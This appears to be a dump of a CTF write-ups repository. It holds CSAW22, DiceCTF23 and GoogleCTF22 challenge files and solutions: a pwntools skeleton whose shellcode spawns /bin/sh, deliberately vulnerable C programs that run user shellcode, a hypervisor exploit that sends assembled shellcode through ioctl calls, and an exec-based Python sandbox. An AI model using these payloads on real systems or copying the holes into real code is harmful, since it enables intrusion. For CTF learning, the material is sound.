| I provide skeleton code for the exploit script. 15 | 16 | Your task is to read the hints in the script and complete the script. 
17 | 18 | # Debug 19 | You can debug in your own container, or you can use mine: 20 | 21 | `docker pull n132/pwn:22.04` (I installed the tools with [this script][1]) 22 | 23 | After pulling the image, you can run the container with this command (`--privileged` grants the container broad access to the host, so use it only on a disposable machine; for attaching GDB, `--cap-add=SYS_PTRACE` is usually enough): 24 | `docker run --privileged -it n132/pwn:22.04 zsh` 25 | 26 | Then, copy the vulnerable file from the host into the container, whose ID can be found with `docker ps -a`. 27 | 28 | Run these commands on your host to perform the copy: 29 | 30 | ```sh 31 | docker cp ./bin/exp.py {Container ID}:/ 32 | docker cp ./bin/chal1 {Container ID}:/ 33 | ``` 34 | 35 | Now you can debug the binary in the container by running `python3 exp.py`. Please don't forget to run `tmux` before debugging. 36 | 37 | You can also find more commands on this page: `https://docs.docker.com/engine/reference/commandline/docker/`. 38 | 39 | # Debug with GDB 40 | 41 | This [article][2] will help you debug with GDB. 42 | 43 | 44 | 45 | [1]: https://github.com/n132/CTF-Challenges/blob/main/Enviroment/Docker/Ubuntu22.04.sh 46 | [2]: https://n132.github.io/2018/03/06/Debug_With_GDB.html 47 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/all/chal1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/all/chal1 -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/all/chal2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/all/chal2 -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/all/chal3: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/all/chal3 -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/all/chal4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/all/chal4 -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/public/bin/chal -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | context.log_level='debug' 3 | p = process("./chal1") 4 | # p = remote("127.0.0.1", 60001) 5 | context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P'] 6 | gdb.attach(p) # attach to debug, don't forget to run "tmux" before running the script 7 | # Tip: In x64, 8 | # rdi/rsi/rdx is the register to store the first/second/third parameter of a syscall 9 | # rax is the syscall number, for example `mov rax,0 ; syscall` means calling read 10 | # Also, the return value would be stored at rax 11 | 12 | # There is a template of syscall(v1,v2,0,0) 13 | # You can check all Linux x64 syscalls at this page: https://syscalls64.paolostivanin.com/ 14 | # Your task is understanding and completing the shellcode 15 | 16 | # And our goal is running exec("/bin/sh",0,0) to get a shell 17 | # Make sure to hexify the arguments for shellcode! 
18 | 19 | v1 = ? 20 | v2 = ? 21 | 22 | context.arch = 'amd64' 23 | 24 | shellcode = f''' 25 | xor rax, rax 26 | xor rdi, rdi 27 | xor rsi, rsi 28 | xor rdx, rdx 29 | mov rax, {v1} 30 | mov rdi, {v2} 31 | push rdi 32 | mov rdi, rsp 33 | syscall 34 | ''' 35 | 36 | p.sendlineafter(": \n",asm(shellcode).ljust(0x100,b'\0')) 37 | 38 | p.interactive() 39 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/flag: -------------------------------------------------------------------------------- 1 | flag{this_is_a_fake_flag} -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/logo: -------------------------------------------------------------------------------- 1 | oooo .oooo. 2 | `888 .dP""Y88b 3 | 888 .oo. .ooooo. oooo oooo ooo ]8P' oo.ooooo. oooo oooo ooo ooo. .oo. 4 | 888P"Y88b d88' `88b `88. `88. .8' .d8P' 888' `88b `88. `88. .8' `888P"Y88b 5 | 888 888 888 888 `88..]88..8' .dP' 888 888 `88..]88..8' 888 888 6 | 888 888 888 888 `888'`888' .oP .o 888 888 `888'`888' 888 888 7 | o888o o888o `Y8bod8P' `8' `8' 8888888888 888bod8P' `8' `8' o888o o888o 8 | 888 9 | o888o 10 | 11 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/bin/start.sh: -------------------------------------------------------------------------------- 1 | cd ./run; cat ./logo ; timeout 120 ./chal 2 | 3 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/ctf.xinetd: -------------------------------------------------------------------------------- 1 | service ctf 2 | { 3 | disable = no 4 | socket_type = stream 5 | protocol = tcp 6 | wait = no 7 | user = root 8 | type = UNLISTED 9 | port = 9999 10 | bind = 0.0.0.0 11 | server = /usr/sbin/chroot 12 | # replace helloworld to your program 13 | server_args = --userspec=1000:1000 /home/ctf ./run/start.sh 14 | 
banner_fail = /etc/banner_fail 15 | # safety options 16 | per_source = 10 # the maximum instances of this service per source IP address 17 | rlimit_cpu = 20 # the maximum number of CPU seconds that the service may use 18 | #rlimit_as = 1024M # the Address Space resource limit for the service 19 | #access_times = 2:00-9:00 12:00-24:00 20 | } 21 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.9' 2 | 3 | services: 4 | ctf: 5 | build: ./ 6 | image: ctf 7 | volumes: 8 | - "./bin:/home/ctf/run:ro" 9 | - "./ctf.xinetd:/etc/xinetd.d/ctf:ro" 10 | - "./tmp:/tmp:ro" 11 | ports: 12 | - "60001:9999" 13 | expose: 14 | - "9999" 15 | pids_limit: 1024 16 | cpus: 0.5 17 | restart: unless-stopped 18 | privileged: true # NOTE(review): privileged mode gives the container all capabilities and access to host devices, i.e. very little isolation from the host; confirm the challenge really needs it and run this only on a disposable host 19 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/src/chal1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | void init(){ 4 | // Set stdin/stdout unbuffered 5 | // So folks would not have io(input/output) issues 6 | fclose(stderr); 7 | setvbuf(stdin, 0, 2, 0); 8 | setvbuf(stdout, 0, 2, 0); 9 | } 10 | int main(){ 11 | init(); 12 | // A buffer is created to store your shellcode 13 | char buf[0x100]; 14 | puts("Enter your shellcode: "); 15 | read(0, buf, 0x100); 16 | // A function pointer is defined and points to the buffer. 
17 | void (* p )(); 18 | p = (void (*)()) buf; 19 | // Let's run the shellcode 20 | p(); 21 | return 0; 22 | } 23 | 
--------------------------------------------------------------------------------
/csaw22-quals/pwn/how2pwn/public/src/chal2.c:
--------------------------------------------------------------------------------
// NOTE: the header names that followed each #include are missing from this listing.
#include
#include
#include
#include
#include
#include

/* Print the message s with puts() and end the process with status 1 via _exit(). */
void panic(char *s){
    puts(s);
    _exit(1);
}

/*
 * Ticket gate for this stage.
 *
 * Opens "./ticket", reads up to 0x20 bytes from it and up to 0x20 bytes from
 * fd 0, and calls panic() unless strncmp() finds the two buffers equal over
 * 0x20 bytes. Both buffers are 0x30 bytes and zero-initialized, so they are
 * always NUL-terminated after the reads.
 */
void checkin(){
    // Solved the previous challenge, and find the ticket in "/flag"
    char real_ticket[0x30] = {0};
    char your_ticket[0x30] = {0};
    int f = open("./ticket",0);
    if(f<0)
        panic("[-] Fail to open tickect");
    // NOTE(review): neither read() return value is checked, so a failed or
    // short read of the ticket file goes unnoticed and the comparison below
    // runs on whatever the zeroed buffer holds. Checking that exactly 0x20
    // bytes were read from f would make the gate fail closed.
    read(f,real_ticket,0x20);
    read(0,your_ticket,0x20);
    close(f);
    // strncmp() stops at the first NUL byte; it is not a fixed-length compare.
    if(strncmp(real_ticket,your_ticket,0x20))
        panic("[-] Wrong Ticket");
    return ;
}

/*
 * Close stderr, call setvbuf() on stdin and stdout with mode 2 and no buffer
 * (2 is _IONBF on glibc, i.e. unbuffered), then run the ticket check.
 */
void init(){
    fclose(stderr);
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    checkin();
}

/*
 * Intentionally vulnerable challenge entry point: after init(), reads at most
 * 0x10 bytes from fd 0 into a 0x100-byte stack buffer and calls the buffer as
 * a function. Presumably the binary is built with an executable stack; the
 * build flags are not part of this listing.
 */
int main(){
    init();
    char buf[0x100];
    puts("Enter your shellcode: ");
    read(0, buf, 0x10);
    // Sorry I am too lazy to type an additional "0"
    void (* p )();
    p = (void (*)())buf;   // reinterpret the input buffer as code
    p();
    return 0;
}
-------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Add your startup script 3 | 4 | # DO NOT DELETE 5 | /etc/init.d/xinetd start; 6 | sleep infinity; 7 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-after.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-after.png 
-------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-after2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-after2.png -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-before.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-before.png -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-before2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-before2.png -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/writeup-resources/chal2-ss-call-rdx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-quals/pwn/how2pwn/writeup-resources/chal2-ss-call-rdx.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/chatgpt-output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/chatgpt-output.png -------------------------------------------------------------------------------- 
/diceCTF23/misc/mlog/resources/chatgpt-prompt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/chatgpt-prompt.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/flag.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/playground-flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/playground-flag.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/prompt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/prompt.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/resources/sample-input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/resources/sample-input.png -------------------------------------------------------------------------------- /diceCTF23/misc/mlog/src/mlog.tar.gz: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/misc/mlog/src/mlog.tar.gz -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # directory initramfs/ contains the extracted initramfs.cpio.gz 3 | 4 | set -e 5 | gcc -static main.c -o main 6 | mv main initramfs 7 | 8 | cd initramfs 9 | find . -print0 | cpio --null --create --verbose --format=newc | gzip --best > ../initramfs_patched.cpio.gz 10 | cd - 11 | 12 | cp initramfs_patched.cpio.gz /mnt/vm-tmp-shared/tmp-upload/initramfs_patched.cpio.gz 13 | # http://80.113.228.215:53023/initramfs_patched.cpio.gz 14 | -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/gen-shellcode.py: -------------------------------------------------------------------------------- 1 | 2 | from pwn import * 3 | 4 | # Set up pwntools for the correct architecture. 
See `context.binary/arch/bits/endianness` for more 5 | context.binary = elfexe = ELF('./dicer-visor') 6 | 7 | def dumpShellcode(shellcode): 8 | shellcode_str = '' 9 | for b in shellcode: 10 | shellcode_str += "\\x{:02x}".format(b) 11 | msg = f'const char *shellcode = "{shellcode_str}";\n' 12 | msg += f'const size_t shellcode_len = {len(shellcode)};' 13 | print(msg) 14 | 15 | shellcode = b'' 16 | shellcode += asm( 17 | ''' 18 | xor rdx, rdx /* O_RDONLY */ 19 | ''' + 20 | pwnlib.shellcraft.linux.cat("flag.txt") 21 | ) 22 | dumpShellcode(shellcode) 23 | -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/init: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | #mount -t proc none /proc 4 | #mount -t sysfs none /sys 5 | #mount -t debugfs none /sys/kernel/debug 6 | 7 | echo 1 > /sys/module/rcutree/parameters/rcu_cpu_stall_suppress 8 | 9 | echo "Hello kernel world!" 10 | 11 | /sbin/insmod /vuln.ko 12 | mknod /dev/exploited-device c 32 0 13 | chmod ugo+x /main 14 | 15 | exec /main 16 | -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/initramfs_patched.cpio.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/pwn/dice-visor/solution/initramfs_patched.cpio.gz -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/solution/main.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | const char *shellcode = 
"\x48\x31\xd2\x6a\x01\xfe\x0c\x24\x48\xb8\x66\x6c\x61\x67\x2e\x74\x78\x74\x50\x6a\x02\x58\x48\x89\xe7\x31\xf6\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05"; 11 | const size_t shellcode_len = 47; 12 | 13 | int main(int argc, char ** argv) { 14 | printf("Hello World!\n"); 15 | 16 | int fd = open("/dev/exploited-device", O_RDWR); 17 | if(fd == -1) { 18 | perror("open"); 19 | exit(1); 20 | } 21 | 22 | ssize_t res = write(fd, shellcode, shellcode_len); 23 | if(res != shellcode_len) { 24 | printf("write error. Written: %ld\n", res); 25 | exit(1); 26 | } 27 | res = ioctl(fd, 0xdead); //write shellcode to supervisor 28 | if (res<0) { 29 | perror("ioctl1"); 30 | exit(1); 31 | } 32 | res = ioctl(fd, 0xbeef); //invoke shellcode 33 | if (res<0) { 34 | perror("ioctl2"); 35 | exit(1); 36 | } 37 | 38 | return 0; 39 | } 40 | 41 | //dice{dicer-visor-rules} 42 | -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/src/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/pwn/dice-visor/src/bzImage -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/src/dicer-visor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/pwn/dice-visor/src/dicer-visor -------------------------------------------------------------------------------- /diceCTF23/pwn/dice-visor/src/initramfs.cpio.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/pwn/dice-visor/src/initramfs.cpio.gz 
-------------------------------------------------------------------------------- /diceCTF23/rev/not-baby-parallelism/solution.py: -------------------------------------------------------------------------------- 1 | 2 | import string 3 | import os 4 | import sys 5 | 6 | FLAG_LEN = 51 7 | IF_NAME = 'generated_input.txt' 8 | OF_NAME = "output.txt" 9 | prefix = 'dice{' 10 | 11 | def readOutput(OF_NAME): 12 | res = [] 13 | with open(OF_NAME) as f: 14 | for _ in range(FLAG_LEN): 15 | num = int(f.readline().strip()) 16 | res.append(num) 17 | assert(len(res) == FLAG_LEN) 18 | return res 19 | expected_flag = readOutput("src/flag.out") 20 | # print(expected_flag) 21 | 22 | while len(prefix) < FLAG_LEN: 23 | print(f"Current prefix: {prefix}") 24 | alphabet = string.printable 25 | guess_found = False 26 | for g in alphabet: 27 | flag = prefix + g + 'A'*(FLAG_LEN-len(prefix)-1-1) + '}' 28 | assert(len(flag) == FLAG_LEN) 29 | with open(IF_NAME, 'w') as f: 30 | f.write(f'{FLAG_LEN}\n') 31 | for c in flag: 32 | f.write(f'{ord(c)}\n') 33 | os.system(f'./src/pppp -n 1 -i {IF_NAME} -o {OF_NAME} > /dev/null') 34 | output = readOutput(OF_NAME) 35 | guess_idx = len(prefix) 36 | if expected_flag[:guess_idx+1] == output[:guess_idx+1]: 37 | print(f"It is a match! 
char: {g}") 38 | guess_found = True 39 | prefix += g 40 | break 41 | 42 | if not guess_found: 43 | print("No guess found!") 44 | sys.exit(1) 45 | 46 | if len(prefix) == FLAG_LEN-1: 47 | prefix += '}' 48 | break 49 | 50 | print(f"\nFlag: {prefix}") 51 | # dice{p4r411el_pref1x_sc4ns_w0rk_efficient_but_sl0w} 52 | -------------------------------------------------------------------------------- /diceCTF23/rev/not-baby-parallelism/src/flag.out: -------------------------------------------------------------------------------- 1 | 100 2 | 13 3 | 110 4 | 19 5 | 104 6 | 30 7 | 42 8 | 1539 9 | 1591 10 | 1544 11 | 1593 12 | 136971 13 | 137063 14 | 137022 15 | 137038 16 | 5230 17 | 5131 18 | 5233 19 | 5184 20 | 397480 21 | 397559 22 | 397524 23 | 397495 24 | 12938 25 | 13028 26 | 12967 27 | 13048 28 | 892722 29 | 892674 30 | 892788 31 | 892703 32 | 19864 33 | 19965 34 | 19867 35 | 19965 36 | 357552 37 | 357587 38 | 357562 39 | 357599 40 | 19682 41 | 19606 42 | 19725 43 | 19823 44 | 1299012 45 | 1298992 46 | 1299055 47 | 1298972 48 | 24582 49 | 24630 50 | 24653 51 | 24624 52 | -------------------------------------------------------------------------------- /diceCTF23/rev/not-baby-parallelism/src/pppp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/not-baby-parallelism/src/pppp -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/resources/gdb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/resources/gdb.png -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/resources/memcmp.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/resources/memcmp.png -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/resources/ready-to-attach.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/resources/ready-to-attach.png -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/resources/run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/resources/run.png -------------------------------------------------------------------------------- /diceCTF23/rev/parallelism/src/parallelism: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/diceCTF23/rev/parallelism/src/parallelism -------------------------------------------------------------------------------- /diceCTF23/rev/time-travel/solution.py: -------------------------------------------------------------------------------- 1 | 2 | import struct 3 | import numpy as np 4 | from ctypes import * 5 | 6 | 7 | with open("input.bin", 'rb') as f: 8 | data = f.read() 9 | assert(len(data) == 0x28a04) 10 | 11 | flag = '' 12 | N = struct.unpack(" 4 | #include //MAP_UNINITIALIZED 5 | #include 6 | #include 7 | #include 8 | 9 | #include 10 | #include 11 | #include 12 | 13 | void test1() { 14 | void *res = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 15 | assert(res); 16 | 17 | printf("mmaped at %p\n", res); 18 | memset(res, 0x41, 0x1000); 19 | 20 | void *overlap = mmap(res, 
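0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED|MAP_UNINITIALIZED, -1, 0);
    printf("overlap: %p\n", overlap);

    /*
     * Hypothesis: Remapping at the same area might keep the previous contents
     * Result: This did not happen
     */
}

/*
 * Experiment: compare the result of stat() when its output buffer is a normal
 * stack object with the result when the buffer is a page mapped PROT_NONE.
 *
 * Maps one anonymous 0x1000-byte page with PROT_NONE, calls stat("test", ...)
 * once with &mybuf and once with the PROT_NONE page, and prints both return
 * values. errno is not printed; the -1 in the second case is presumably EFAULT.
 */
void test2() {
    struct stat mybuf;

    void *res = mmap(NULL, 0x1000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    // mmap() reports failure with MAP_FAILED, not NULL, so the previous
    // assert(res) could never fire on a failed mapping.
    // Note that assert() is compiled out when NDEBUG is defined.
    assert(res != MAP_FAILED);

    //CWD contains "test" file (aka this binary)
    int syscall_res;
    syscall_res = stat("test", &mybuf);
    printf("Valid syscall result: %d\n", syscall_res);

    // Same path, but the kernel cannot write the result into a PROT_NONE page.
    syscall_res = stat("test", res);
    printf("Invalid syscall result: %d\n", syscall_res);

    /*
     * Hypothesis stat(const char *pathname, struct stat *statbuf); with a valid pathname and a PROT_NONE statbuf might be our side-channel
     * Result: This WORKS!
     *      Valid syscall result: 0
     *      Invalid syscall result: -1
     */
}

/* Runs only the second experiment; test1() is kept for reference but not called. */
int main() {
    test2();
    return 0;
}
-------------------------------------------------------------------------------- /googleCTF22/misc/appnote/resources/2551253642bde3066e55c9cc8e9b0b4aa77feadc00c81032da778e6f7c89907135dfc2611fd8617204720dbfadb31429ae11f6ecd202887f4ce99f2f53a3c5e8.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/misc/appnote/resources/2551253642bde3066e55c9cc8e9b0b4aa77feadc00c81032da778e6f7c89907135dfc2611fd8617204720dbfadb31429ae11f6ecd202887f4ce99f2f53a3c5e8.zip -------------------------------------------------------------------------------- /googleCTF22/misc/appnote/resources/detailed-offsets.png: -------------------------------------------------------------------------------- 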
https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/misc/appnote/resources/detailed-offsets.png -------------------------------------------------------------------------------- /googleCTF22/misc/appnote/resources/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/misc/appnote/resources/overview.png -------------------------------------------------------------------------------- /googleCTF22/misc/appnote/src/dump.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/misc/appnote/src/dump.zip -------------------------------------------------------------------------------- /googleCTF22/sandbox/treebox/resources/17f98f8c9c9f8089ab3a35e94de752582253c3784637fe6ef6a561c12b817fcd7acf05a4573bff2cd43247f8e5263200aa29745605ae2719de774160bb21e301.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/googleCTF22/sandbox/treebox/resources/17f98f8c9c9f8089ab3a35e94de752582253c3784637fe6ef6a561c12b817fcd7acf05a4573bff2cd43247f8e5263200aa29745605ae2719de774160bb21e301.zip -------------------------------------------------------------------------------- /googleCTF22/sandbox/treebox/src/.python-version: -------------------------------------------------------------------------------- 1 | 3.10.4 2 | -------------------------------------------------------------------------------- /googleCTF22/sandbox/treebox/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | RUN apt-get update && apt-get install python3 python3-pip -yy 3 | RUN pip install 
ipython 4 | 5 | COPY treebox.py /home/treebox.py 6 | COPY flag /home/flag 7 | 8 | WORKDIR /home 9 | CMD "/bin/bash" 10 | -------------------------------------------------------------------------------- /googleCTF22/sandbox/treebox/src/flag: -------------------------------------------------------------------------------- 1 | CTF{CzeresniaTopolaForsycja}
--------------------------------------------------------------------------------
/googleCTF22/sandbox/treebox/src/treebox.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3 -u
#
# Flag is in a file called "flag" in cwd.
#
# Quote from Dockerfile:
#   FROM ubuntu:22.04
#   RUN apt-get update && apt-get install -y python3
#
import ast
import sys
import os

def verify_secure(m):
    """Return True unless the parsed module `m` contains a banned AST node.

    Walks every node reachable from `m` with ast.walk() and rejects the input
    as soon as it meets a node whose type equals ast.Import, ast.ImportFrom or
    ast.Call, printing that node first.

    NOTE(review): this is a deny-list over three node types, not a sandbox.
    A True result only means none of those three node types was present; it
    says nothing about what the code does when executed. Untrusted code needs
    OS-level isolation (a separate unprivileged process or container with a
    restricted filesystem), not source filtering.
    """
    for x in ast.walk(m):
        match type(x):
            # Value patterns: compared by equality against the node's exact type.
            case (ast.Import|ast.ImportFrom|ast.Call):
                print(f"ERROR: Banned statement {x}")
                return False
    return True

# Change into the directory that holds this script.
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)

print("-- Please enter code (last line must contain only --END)")
source_code = ""
# Collect stdin lines until one *starts with* "--END" (a looser check than the
# prompt states).
# NOTE(review): readline() returns "" at EOF, which never starts with "--END",
# so this loop does not terminate if stdin is closed before the marker arrives.
while True:
    line = sys.stdin.readline()
    if line.startswith("--END"):
        break
    source_code += line

# First compile: parse only, producing an AST for the filter.
tree = compile(source_code, "input.py", 'exec', flags=ast.PyCF_ONLY_AST)
if verify_secure(tree):  # Passed the AST filter (not a proof of safety, see verify_secure)
    print("-- Executing safe code:")
    # Second compile: the same source text, this time to a code object.
    compiled = compile(source_code, "input.py", 'exec')
    # Runs inside this process and in this module's namespace; there is no isolation.
    exec(compiled)
-------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/gdb-multiarch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/gdb-multiarch.png -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/pwntools-gdb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/pwntools-gdb.png -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/riscv-datatypes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/riscv-datatypes.png -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/riscv-registers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/RISC-V-Smash-Baby/resources/riscv-registers.png -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/src/minimal-template.py: -------------------------------------------------------------------------------- 1 | # minimal-template.py 2 | # A minimal custom template for binary exploitation that 
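# uses pwntools.
# Run:
#   python minimal-template.py [DEBUG] [GDB]
from pwn import *

# Set up pwntools for the correct architecture. See `context.binary/arch/bits/endianness` for more
context.binary = elfexe = ELF('./smash-baby')
print(context)

def start(argv=[], *a, **kw):
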